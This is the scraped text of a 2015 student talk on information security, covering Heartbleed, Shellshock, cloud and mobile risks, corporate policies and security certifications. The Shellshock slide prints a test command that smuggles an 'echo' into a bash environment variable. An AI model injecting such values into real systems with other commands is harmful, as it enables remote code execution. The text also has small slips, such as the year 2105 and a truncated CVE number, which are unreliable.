Upload
votruc
View
226
Download
5
Embed Size (px)
Citation preview
Justin David Pineda, C|EH Lyceum of the Philippines University (LPU) Batangas City, Batangas February 2, 2105 http://justinspeaks.wordpress.com
Present: Sr. Application Security
Specialist, The Coca-Cola Company
Faculty (Part-time), Asia Pacific College
Past
Security Analyst, Silversky
The need for information security Summary of security threats 2014 Balancing security in the industry Demand for information security
professionals Security certifications
Software Development – Creating a secure application
Network Administration– Deployment of firewalls, intrusion detection systems
Think about a security problem that must be solved and apply your CS skills.
April 2014
Security bug in OpenSSL cryptography library.
Results from improper input validation. Registered under CVE-2014-0160. Discovered by Canadian Cyber Incident
Response Centre. Approx. half a million web servers are
affected.
Heartbeat – extension for keep alive of secure communications
Problem: No bounds checking Status of different versions:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are
vulnerable OpenSSL 1.0.1g is NOT vulnerable OpenSSL 1.0.0 branch is NOT vulnerable OpenSSL 0.9.8 branch is NOT vulnerable
September 2014
Security bug used in UNIX bash shell Allows attacker to execute arbitrary
commands remotely to vulnerable versions. Registered under CVE-2014-627.
Affected systems:
Linux, BSD, and Mac OS X distributions
All unpatched Bash versions between 1.14 through 4.3 (i.e. all releases until now) are at risk.
Test on your system: env 'VAR=() { :;}; echo Bash is vulnerable!'
'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
Update Bash version.
Companies are starting to move their infrastructure in the cloud.
Caveats:
You lack control of the infrastructure.
You rely on a third-party implementation.
Reality: Smart devices are getting smaller and smaller yet more powerful than before.
Caveats: How will companies react?
Should they suppress the use of these devices?
What are the threats of these smart devices?
Issues on taking response when a security issue is reported.
For example, BayanPatrol, Hulicam etc. What should be the process for incident
response?
Very strict security policies
no USB’s or any removable media
limited websites that can be visited
not allowed to send non-work related e-mails using company e-mail
Need to change password every 30 days Password complexity Reusing of passwords are prohibited (min
days of password change required)
Relatively young in the PH High demand for security professionals Supply is relatively low compared to other IT
roles. Security Operations/Information Risk
Manager is starting to become an independent department.
IT Security is just a subset of Infosec IT Security:
Application Security – securing applications
Host Security – AV, personal firewall
Network Security – firewalls, anti-spam, intrusion detection systems
Physical security – external and internal controls
Personnel security – manage security guards Operational security – policies (e.g. no ID no
entry, AUP) Risk management – assessment, remediation Legal & Regulations – RA 8750, RA 10175
CS/IT doesn’t have a board exam. You need certifications to prove your
expertise. (getting a driver’s license) You need to practice what you learned. Certifications are internationally recognized. Certifications will help you professionally. Goal: Specialist to Management
Are we being watched?
Explore the cybercrimes Create meaningful laws that
would “really” benefit the public. Public, specifically Filipinos, must
be protected when transacting online.